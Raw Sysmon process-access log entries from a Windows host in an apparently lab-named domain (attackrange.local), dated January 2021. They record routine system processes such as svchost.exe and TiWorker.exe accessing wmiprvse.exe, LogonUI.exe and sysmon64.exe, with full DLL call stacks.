13:29:54.185{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.154{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000009580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.154{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000009579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4752-6000-0805-000000009A01}3832C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 